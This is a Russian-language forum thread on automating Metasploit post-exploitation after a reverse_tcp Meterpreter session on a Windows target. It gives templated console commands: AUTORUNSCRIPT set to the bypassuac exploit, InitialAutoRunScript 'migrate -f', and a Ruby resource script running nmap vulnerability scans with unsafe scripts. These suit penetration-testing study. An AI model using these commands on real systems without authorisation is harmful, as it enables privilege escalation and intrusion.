Автоматическое совершение определённых действий после подключения по reverse_tcp

adm2

Green Team
05.07.2017
50
120
BIT
0
Добрый день)
Дано:
1. Кали линукс и листенер на 4444 порту
2. жертва "Виндовс"
Хочется:
Чтобы при запуске пейлоада на "Виндовсе" и коннекта к кали автоматически запускались какие-нибудь модули метерпретера)
Подскажите инфу, где про это можно почитать. Бегло вроде и здесь на форуме видел, но не знаю точно как сформулировать запрос)
Спасибо)
 
В теории: на дедике нужно настроять определённый скрипт, который при получении сессии булет выполнять заданые команды. О реаизации немного пожже напишу.
 
Было бы прям ну вообще шикарно)
А нет, моя теория слишком "заумна" :) .
Всё просто:
Автоматическая подгрузка сценариев:
Итак, допустим, мы хотим, чтобы при получении сессии сразу выполнялось повышение привелегий на атакуемой Windows машине через
известный сплоит bypass_uac
Без лишних слов, просто как это сделать:
Код (Text):
use <name exploit>
set LHOST <inner_ip>
..................
set PAYLOAD <pyaload_meterpreter>
set AUTORUNSCRIPT exploit/windows/local/bypassuac
Вот как раз последняя строчка и отвечает за то что подгрузить при успешной создании сессии.
Альтернативная переменная InitialAutoRunScript, которой просто нужно дать команду для пост эксплуатации.
Пример: set InitialAutoRunScript 'migrate -f'

Свои сценарии
Пришло время автоматизировать процесс и написать свой сценарий для метрпретера.
Существует возможность загнать в файл уже заранее известный алгоритм команд метасплоита и выполнить его
с помощью rc скриптов. Причем такие скрипты могут включать в себя как код на руби (свои какие то действия), так и возможности
метаплоита.
Попробуем создать файл scanner.rc (так как я не спецаилист руби, то пример взят отсюда )
Выглядит скрипт руби так

Код (Text):
#calling ruby
< ruby >
run_single("db_nmap -sU -sS -Pn -n --script=smb-check-vulns.nse,samba-vuln-cve-2012-1182 --script-args=unsafe=1 -p U:135,T:139,445 #{framework.datastore['RHOSTS']}")
run_single("db_nmap -sS -Pn -n --script=ftp-vuln-cve2010-4221.nse -p 21 #{framework.datastore['RHOSTS']}")
run_single("services #{framework.datastore['RHOSTS']}")
run_single("vulns #{framework.datastore['RHOSTS']}")
< / ruby >
И вызываем его в консоли метасплоита командой resource scanner.rc
Оригинал и полная версия: https://codeby.net/threads/metasploit.59214/
 
  • Нравится
Реакции: adm2
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!